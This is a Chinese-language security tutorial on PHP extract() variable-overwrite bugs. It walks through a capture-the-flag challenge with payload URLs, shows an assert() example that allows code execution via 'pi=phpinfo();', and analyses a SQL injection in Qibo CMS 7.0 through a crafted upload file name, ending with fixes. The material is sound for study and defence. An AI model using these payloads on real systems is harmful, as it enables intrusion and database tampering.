extract()函数使用参考
http://www.w3school.com.cn/php/func_array_extract.asp
漏洞产生原因:
Copy extract()函数当只有一个参数时,默认的第二参数是:EXTR_OVERWRITE,如果有变量发生冲突,则覆盖已有的变量。 参考代码:
Copy <?php
$flag='xxx';
extract($_GET);
if(isset($shiyan))
{
$content=trim(file_get_contents($flag));
if($shiyan==$content)
{
echo'flag{xxx}';
}
else
{
echo'Oh.no';
}
}
?> 我们大体上分析一下代码逻辑,使用get方式获取一个值,然后使用extract方法使他变成一个变量,然后判断是否已经声明了$shiyan这个变量名,若未声明则输出‘Oh.no’,若已经声明,则使用file_get_contents方法将$flag的值转换为字符串,然后使用trim方法去除字符串两侧的空白字符或其他预定义字符,然后判断$shiyan的值是不是==$content的值,若等于,则输出flag
在之前我们已经说过,extract()函数当只有一个参数时,默认的第二参数是:EXTR_OVERWRITE,如果有变量发生冲突,则覆盖已有的变量。而在php中null == "string" --> true
所以我们现在需要解决的问题就是:
if(isset($shiyan)) --> TRUE
if($shiyan==$content) --> TRUE
先给出最后的payload:
Copy http://123.206.87.240:9009/1.php?shiyan=
http://123.206.87.240:9009/1.php?shiyan=&flag=
http://123.206.87.240:9009/1.php?shiyan=&content=
http://123.206.87.240:9009/1.php?shiyan
http://123.206.87.240:9009/1.php?shiyan&flag
http://123.206.87.240:9009/1.php?shiyan&content
http://123.206.87.240:9009/1.php?shiyan=999&flag=data://,999 因为我们知道,最基本的条件就是需要一个变量$shiyan才能进行下面的操作,所以我们最基本的就是传入一个$shiyan变量。
以第一个payload为例:
Copy http://123.206.87.240:9009/1.php?shiyan=
http://123.206.87.240:9009/1.php?shiyan 此时就相当于传入了一个值为null的变量$shiyan,而null==string,所以可以输出flag
第二个payload:
Copy http://123.206.87.240:9009/1.php?shiyan=&flag=
http://123.206.87.240:9009/1.php?shiyan&flag 此时就相当于传入了一个值为null的变量$shiyan和一个值为null的变量$flag,而传入的flag又会覆盖掉本来存在的$flag,使得$content的值=null,所以可以输出flag
第三个payload:
Copy http://123.206.87.240:9009/1.php?shiyan=&content=
http://123.206.87.240:9009/1.php?shiyan&content 这个跟第二个同理,只是这个覆盖了$content的值,使得$content的值=null,所以可以输出flag
第四个请自行思考。
另一个例子:
Copy extract($_POST);
function goAway() {
error_log("Hacking attempt.");
header('Location: /error/');
}
if (!isset($pi) || !is_numeric($pi)) {
goAway();
}
if (!assert("(int)$pi == 3")) {
echo "This is not pi.";
} else {
echo "This might be pi.";
} 这个很明显就是存在一个变量覆盖漏洞,如我们传入一个?pi=phpinfo();进去,就会导致任意代码执行。
齐博cms7.0分析
具体分析地址:
http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.96tpib&id=13
漏洞的原因就是 inc/common.inc.php 中的这一段代码:
Copy if(!ini_get('register_globals')){
@extract($_FILES,EXTR_SKIP);
} 这段代码的含义就是把 php接收到的$_Files 请求的数组转换成一些变量。而我们知道,这些变量是不会经过魔术引号的转义的。 再看 member/comment.php 这个文件,如下代码:
Copy if($job=='del'){
foreach( $cidDB AS $key=>$value){
$rs=$db->get_one("SELECT aid FROM {$pre}comment WHERE cid='$value'");
$erp=get_id_table($rs[aid]);
$rsdb=$db->get_one("SELECT C.cid,C.uid AS commentuid,C.aid,A.uid,A.fid FROM {$pre}comment C LEFT JOIN {$pre}article$erp A ON C.aid=A.aid WHERE C.cid='$value'");
if($rsdb[uid]==$lfjuid||$rsdb[commentuid]==$lfjuid||$web_admin||in_array($rsdb[fid],$fiddb)){
$db->query("DELETE FROM {$pre}comment WHERE cid='$rsdb[cid]'");
}
$db->query("UPDATE {$pre}article$erp SET comments=comments-1 WHERE aid='$rsdb[aid]'");
}
refreshto("$FROMURL","删除成功",0);
} 其中 $cidDB 这个变量本应该是从URL里面通过get方式获取的留言的id ,然后拼到sql语句里面执行sql的。
但是因为 comment.php引用了common.inc.php,并且$cidDB并没有初始化,所以这边我们可以用 $_Files里面的变量去直接给 $cidDB 赋值,并且没有转义。
构造poc:
然后将我们的payload命名为文件名即可。
修复
1、设置register_globals=OFF
2、在调用extract()时使用EXTR_SKIP
